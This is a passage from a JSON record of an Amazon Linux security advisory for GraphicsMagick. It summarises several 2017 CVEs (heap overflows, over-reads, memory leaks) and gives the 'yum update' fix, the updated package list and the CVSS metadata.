attackers to cause a denial of service (resource consumption) via crafted JPEG files. ([CVE-2017-11140 __](<https://access.redhat.com/security/cve/CVE-2017-11140>))\n\nIn GraphicsMagick 1.3.26, an allocation failure vulnerability was found in the function ReadMNGImage in coders/png.c when a small MNG file has a MEND chunk with a large length value. ([CVE-2017-13147 __](<https://access.redhat.com/security/cve/CVE-2017-13147>))\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteCMYKImage() function in coders/cmyk.c when processing multiple frames that have non-identical widths. ([CVE-2017-11643 __](<https://access.redhat.com/security/cve/CVE-2017-11643>))\n\nGraphicsMagick 1.3.26 has a Memory Leak in the PersistCache function in magick/pixel_cache.c during writing of Magick Persistent Cache (MPC) files. ([CVE-2017-11641 __](<https://access.redhat.com/security/cve/CVE-2017-11641>))\n\nIn GraphicsMagick there is a heap-based buffer over-read in ReadMNGImage in coders/png.c, related to accessing one byte before testing whether a limit has been reached. ([CVE-2017-17915 __](<https://access.redhat.com/security/cve/CVE-2017-17915>))\n\nIn GraphicsMagick 1.3.27a, there is a buffer over-read in ReadPALMImage in coders/palm.c when QuantumDepth is 8. ([CVE-2017-17783 __](<https://access.redhat.com/security/cve/CVE-2017-17783>))\n\nIn GraphicsMagick 1.3.27a, there is a heap-based buffer over-read in ReadOneJNGImage in coders/png.c, related to oFFs chunk allocation. ([CVE-2017-17782 __](<https://access.redhat.com/security/cve/CVE-2017-17782>))\n\ncoders/wpg.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted file, related to the AcquireCacheNexus function in magick/pixel_cache.c. ([CVE-2017-16669 __](<https://access.redhat.com/security/cve/CVE-2017-16669>))\n\nIn GraphicsMagick there is a heap-based buffer over-read in ReadNewsProfile in coders/tiff.c, in which LocaleNCompare reads heap data beyond the allocated region. ([CVE-2017-17912 __](<https://access.redhat.com/security/cve/CVE-2017-17912>))\n\nThe ReadOneJNGImage function in coders/png.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (application crash) during JNG reading via a zero-length color_image data structure. ([CVE-2017-11102 __](<https://access.redhat.com/security/cve/CVE-2017-11102>))\n\nGraphicsMagick 1.3.26 has a NULL pointer dereference in the WritePCLImage() function in coders/pcl.c during writes of monochrome images. ([CVE-2017-11637 __](<https://access.redhat.com/security/cve/CVE-2017-11637>))\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteRGBImage() function in coders/rgb.c when processing multiple frames that have non-identical widths. ([CVE-2017-11636 __](<https://access.redhat.com/security/cve/CVE-2017-11636>))\n\n \n**Affected Packages:** \n\n\nGraphicsMagick\n\n \n**Issue Correction:** \nRun _yum update GraphicsMagick_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n GraphicsMagick-c++-1.3.28-1.12.amzn1.i686 \n GraphicsMagick-1.3.28-1.12.amzn1.i686 \n GraphicsMagick-devel-1.3.28-1.12.amzn1.i686 \n GraphicsMagick-perl-1.3.28-1.12.amzn1.i686 \n GraphicsMagick-debuginfo-1.3.28-1.12.amzn1.i686 \n GraphicsMagick-c++-devel-1.3.28-1.12.amzn1.i686 \n \n noarch: \n GraphicsMagick-doc-1.3.28-1.12.amzn1.noarch \n \n src: \n GraphicsMagick-1.3.28-1.12.amzn1.src \n \n x86_64: \n GraphicsMagick-c++-1.3.28-1.12.amzn1.x86_64 \n GraphicsMagick-devel-1.3.28-1.12.amzn1.x86_64 \n GraphicsMagick-perl-1.3.28-1.12.amzn1.x86_64 \n GraphicsMagick-debuginfo-1.3.28-1.12.amzn1.x86_64 \n GraphicsMagick-c++-devel-1.3.28-1.12.amzn1.x86_64 \n GraphicsMagick-1.3.28-1.12.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2018-03-07T21:35:00", "published": "2018-03-07T21:35:00", "id": "ALAS-2018-966", "href": "https://alas.aws.amazon.com/ALAS-2018-966.html", "title": "Important: GraphicsMagick", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}